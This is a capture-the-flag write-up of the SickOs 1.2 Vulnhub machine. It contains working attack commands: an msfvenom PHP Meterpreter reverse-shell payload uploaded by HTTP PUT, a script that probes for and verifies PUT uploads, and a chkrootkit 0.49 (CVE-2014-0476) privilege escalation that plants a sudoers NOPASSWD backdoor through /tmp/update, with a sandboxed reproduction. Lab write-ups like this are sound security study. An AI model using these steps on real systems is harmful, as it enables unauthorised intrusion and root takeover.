Another day, another CTF (capture the flag). If you have no projects, you had better sharpen your skills by playing CTFs :p. This time it's SickOs:1.2 from Vulnhub.
1. Service Discovery
We started off using nmap to scan all TCP ports.
Two TCP ports are open, 22 and 80, and nothing interesting on SSH. Usually I proceed to scan UDP, but I was too lazy; I wanted to see how fast I could finish this.
Nothing interesting on port 22, so let's jump over to see what is on port 80.
2. Port 80 HTTP
Let's take a look at port 80, starting with Nikto.
Nothing special here; let's see it in the web browser.
All I see is the dude from The Matrix. Alright, I thought so too, Neo. Next we'll fire up DirBuster.
I can see that there is a directory called test; let's enumerate further.
Very nice, it looks like I can upload files to this directory. I'll upload a PHP Meterpreter payload generated with msfvenom, using this command:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=443 -f raw > tai.php
Next, upload the file tai.php using curl (I love curl). `--upload-file` sends it as an HTTP PUT request; `-0` and `--http1.0` are the same flag (force HTTP/1.0), so passing both is harmless but redundant:
curl --upload-file tai.php http://192.168.0.106/test/tai.php -0 --http1.0
and the file is successfully uploaded
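Before reaching for msfvenom it is worth confirming that a directory really accepts PUT. The script below is an added example written for this page, not part of the original write-up or the SickOs box: it sends an OPTIONS request, parses the Allow header, uploads with the same `--upload-file` / `--http1.0` flags as above, and checks that the file comes back unchanged. The target URL and local file are arguments you supply (assumed, not from the original).

```shell
#!/bin/sh
# Added example, not code from the original write-up. Usage:
#   sh put_probe.sh http://TARGET/test/probe.txt ./probe.txt
# URL and file are assumptions you pass in; nothing here is hard-coded to SickOs.

# Pure helper: does an "Allow:" header value list the PUT method?
# Handles case, CRLF line endings and arbitrary spacing around commas.
allows_put() {
    printf '%s\n' "$1" \
        | tr -d '\r' \
        | tr 'a-z' 'A-Z' \
        | sed 's/^[[:space:]]*ALLOW:[[:space:]]*//' \
        | tr ',' '\n' \
        | sed 's/[[:space:]]//g' \
        | grep -qx 'PUT'
}

# Ask the server which methods the directory accepts. Prints the first
# Allow header line, or nothing if the server does not send one
# (many servers answer OPTIONS on a directory with 404/405, so an
# empty result does not prove PUT is disabled).
fetch_allow_header() {
    curl -s -i -X OPTIONS --http1.0 "$1" | grep -i '^Allow:' | head -n 1
}

# PUT a file (curl's --upload-file is a PUT) and succeed only on a 2xx.
put_file() {
    code=$(curl -s -o /dev/null -w '%{http_code}' --http1.0 --upload-file "$2" "$1")
    case "$code" in
        2??) return 0 ;;
        *)   echo "PUT $1 returned HTTP $code" >&2; return 1 ;;
    esac
}

# GET the uploaded URL back and compare it byte for byte with the local
# file. A .php payload would be executed rather than echoed, so prove the
# upload with a plain text file first and upload the payload second.
verify_upload() {
    curl -s --http1.0 "$1" | cmp -s - "$2"
}

if [ $# -eq 2 ]; then
    url=$1; file=$2
    allow=$(fetch_allow_header "${url%/*}/")
    if allows_put "$allow"; then
        echo "server advertises PUT: $allow"
    else
        echo "PUT not advertised (${allow:-no Allow header}); trying anyway" >&2
    fi
    put_file "$url" "$file" && verify_upload "$url" "$file" \
        && echo "uploaded and verified $file at $url"
fi
```

The OPTIONS probe is advisory only: `put_file` is the real test, and `verify_upload` catches servers that answer 200 to a PUT they silently discarded.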
Do not pay attention to the other files; those are my experiments. It took me a while to figure out that the reverse shell only works on port 443 😀
The next step is to set up a multi/handler listener in Metasploit on port 443 (matching the LPORT in the payload), then open the file in the browser to trigger it.
We have Meterpreter. We drop into a shell, but unfortunately it only has the limited privileges of the web server user (www-data), so we need to escalate to root. Let's enumerate further from here.
We can see that the target machine is running Ubuntu Linux on a 3.11 kernel, plus some fancy banner. As usual at this point I upload and run linuxprivchecker.py; the complete result can be seen here.
After spending hours searching exploit-db.com for vulnerabilities and doing more enumeration, I found that the target machine is running chkrootkit version 0.49, which is vulnerable: versions before 0.50 (CVE-2014-0476) contain an unquoted variable assignment in their slapper() check, so if a file named /tmp/update exists, chkrootkit executes it with its own privileges instead of merely reporting it. After checking the scheduled cron jobs I can see that chkrootkit runs daily from root's cron, so whatever is in /tmp/update runs as root. Next step, I run this command:
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
chmod +x /tmp/update
The file must be executable, because chkrootkit runs it as a command rather than reading it. The chmod 777 on /etc/sudoers is not actually needed (root can append to the file regardless of its mode), but restoring mode 440 afterwards is, since sudo refuses a sudoers file that is world-writable. Be careful with the syntax of the appended line: a malformed sudoers entry breaks sudo for everyone on the box, with no easy way back.
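To see why a file dropped at /tmp/update ends up running as root, here is a sandboxed reproduction of the bug, written for this post and not taken from the original write-up or from chkrootkit's source. It mirrors the unquoted assignment in chkrootkit's slapper() routine, but every path (the fake /tmp/update and a fake sudoers) lives under a temporary directory created with mktemp, and it runs the same payload twice: once executable and once not, to show that the exec bit is what decides whether the escalation works.

```shell
#!/bin/sh
# Added example, not code from the original write-up or from chkrootkit:
# a sandboxed reproduction of why a file at /tmp/update gets executed by
# chkrootkit 0.49 (CVE-2014-0476). Nothing here touches the real
# /tmp/update or /etc/sudoers; every path lives under a mktemp directory.

# Minimal mirror of the buggy loop in chkrootkit's slapper() routine.
# The real line is  file_port=$file_port $i  (unquoted). When file_port
# is empty, the shell parses that as "run the command $i with an
# environment assignment", so every existing file in the list is
# executed by whoever runs chkrootkit, which via cron is root.
vulnerable_slapper_check() {
    rootdir=$1
    slapper_files="$rootdir/tmp/httpd $rootdir/tmp/update $rootdir/tmp/.b"
    file_port=
    for i in $slapper_files; do
        if [ -f "$i" ]; then
            file_port=$file_port $i   # BUG: executes $i instead of appending it
        fi
    done
}

# Write a payload the same way the write-up does, aimed at a sandbox copy
# of sudoers. $2 decides whether the file is made executable.
plant_payload() {
    sandbox=$1
    mkdir -p "$sandbox/tmp" "$sandbox/etc"
    printf 'root ALL=(ALL) ALL\n' > "$sandbox/etc/sudoers"
    printf '%s\n' '#!/bin/sh' \
        "echo 'www-data ALL=NOPASSWD: ALL' >> $sandbox/etc/sudoers" \
        "chmod 440 $sandbox/etc/sudoers" > "$sandbox/tmp/update"
    if [ "$2" = executable ]; then
        chmod +x "$sandbox/tmp/update"
    fi
}

# Returns 0 if the sudoers line landed, i.e. the payload actually ran.
payload_ran() {
    grep -q '^www-data ALL=NOPASSWD: ALL$' "$1/etc/sudoers"
}

# Full run: plant the payload, let the fake "chkrootkit" run, check the
# result, clean up. Exit status 0 means the escalation would have worked.
simulate() {
    mode=$1
    sandbox=$(mktemp -d)
    plant_payload "$sandbox" "$mode"
    # chkrootkit's own exit status is irrelevant here; a non-executable
    # payload just makes the exec fail with "Permission denied" (126).
    vulnerable_slapper_check "$sandbox" 2>/dev/null || true
    if payload_ran "$sandbox"; then result=0; else result=1; fi
    rm -rf "$sandbox"
    return $result
}

simulate executable     && echo "executable /tmp/update: sudoers modified"
simulate not-executable || echo "non-executable /tmp/update: nothing happened"
```

The fix in chkrootkit 0.50 was simply to quote the assignment (`file_port="$file_port $i"`), which turns the file name back into data; the same class of bug is worth grepping for in any root cron script that builds lists from file names.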
After several minutes I ran sudo su for root privileges
and captured the flag, which is located in the /root directory.
Nice VM, I learnt some new techniques. Thanks D4rk36 and Vulnhub!